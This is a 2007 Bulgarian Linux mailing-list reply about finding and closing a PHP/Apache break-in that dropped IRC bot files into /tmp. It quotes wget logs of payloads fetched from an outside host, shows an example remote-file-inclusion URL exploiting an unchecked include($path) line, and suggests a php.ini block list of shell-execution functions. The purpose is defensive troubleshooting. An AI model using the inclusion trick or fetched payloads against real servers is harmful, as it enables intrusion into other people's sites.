|
|
Re: [Lug-bg] пробив през апаче и пхп :(
- Subject: Re: [Lug-bg] пробив през апаче и пхп :(
- From: Valery Dachev <valery@xxxxxxxxxxx>
- Date: Thu, 12 Jul 2007 11:08:38 +0300
Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да
добавиш примерно:
disable_functions =
exec,passthru,system,proc_open,shell_exec
С това ще забраниш изпълнението по-често използваните функции за
изпълнение на команди.
Преди това обаче е добре да разбереш как успяват да накарат PHPто да
изпълнява въпросните функции. В моя случай в бъгавият сайт имаше
глупост от типа на:
include( $path . "/neshtosi.php" );
Променливата $path не винаги се установяваше и хахорите извикваха адрес
от типа на:
http://my.site.com/shitty-script.php?path=http://their.site.com/their-script.txt&
Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят
мизерията, погледни кой е потребителят-собственик на изтеглените
файлове. Това би свършило работа, ако PHP работи като CGI и използваш
SUExec. Ако е като модул и имаш късмета да си с Apache 2, пробвай да
инсталираш MPM ITK (в Debian и Ubuntu пакетът е apache2-mpm-itk).
Разбереш ли кой е потребителят, ще трябва да претърсиш файловете им за
include, include_once, require и require_once, за да видиш кои от тях
използват динамични несигурни пътища. Нищо чудно това да е стара версия
на софтуер с известни проблеми.
Поздрави,
Валери.
deb4o wrote:
няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на
irc bot
все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги
страртират.
но искам да разбера къде е дупката в апачето.
Apache 2.0.53 и php 4.3.9
Така и не мога да разбера от къде влизат. търсих по логовете но само
единственно в error log-a на апачето намирам подобни на тези неща:
--00:43:08-- http://private.whitehat.ro/flood
=> `flood'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208,412 [text/plain]
0K .......... .......... .......... .......... .......... 24% 60.12
KB/s
50K .......... .......... .......... .......... .......... 49% 237.64
KB/s
100K .......... .......... .......... .......... .......... 73% 16.05
KB/s
150K .......... .......... .......... .......... .......... 98% 60.06
KB/s
200K ... 100% 10.13
MB/s
00:43:13 (40.79 KB/s) - `flood' saved [208412/208412]
-------------------
--11:39:45-- http://private.whitehat.ro/n.jpg
=> `n.jpg'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 261,375 [image/jpeg]
0K .......... .......... .......... .......... .......... 19% 60.85
KB/s
50K .......... .......... .......... .......... .......... 39% 122.81
KB/s
100K .......... .......... .......... .......... .......... 58% 16.38
KB/s
150K .......... .......... .......... .......... .......... 78% 61.60
KB/s
200K .......... .......... .......... .......... .......... 97% 81.52
KB/s
250K ..... 100% 1.02
MB/s
11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375]
_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
|
_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
|
|
|
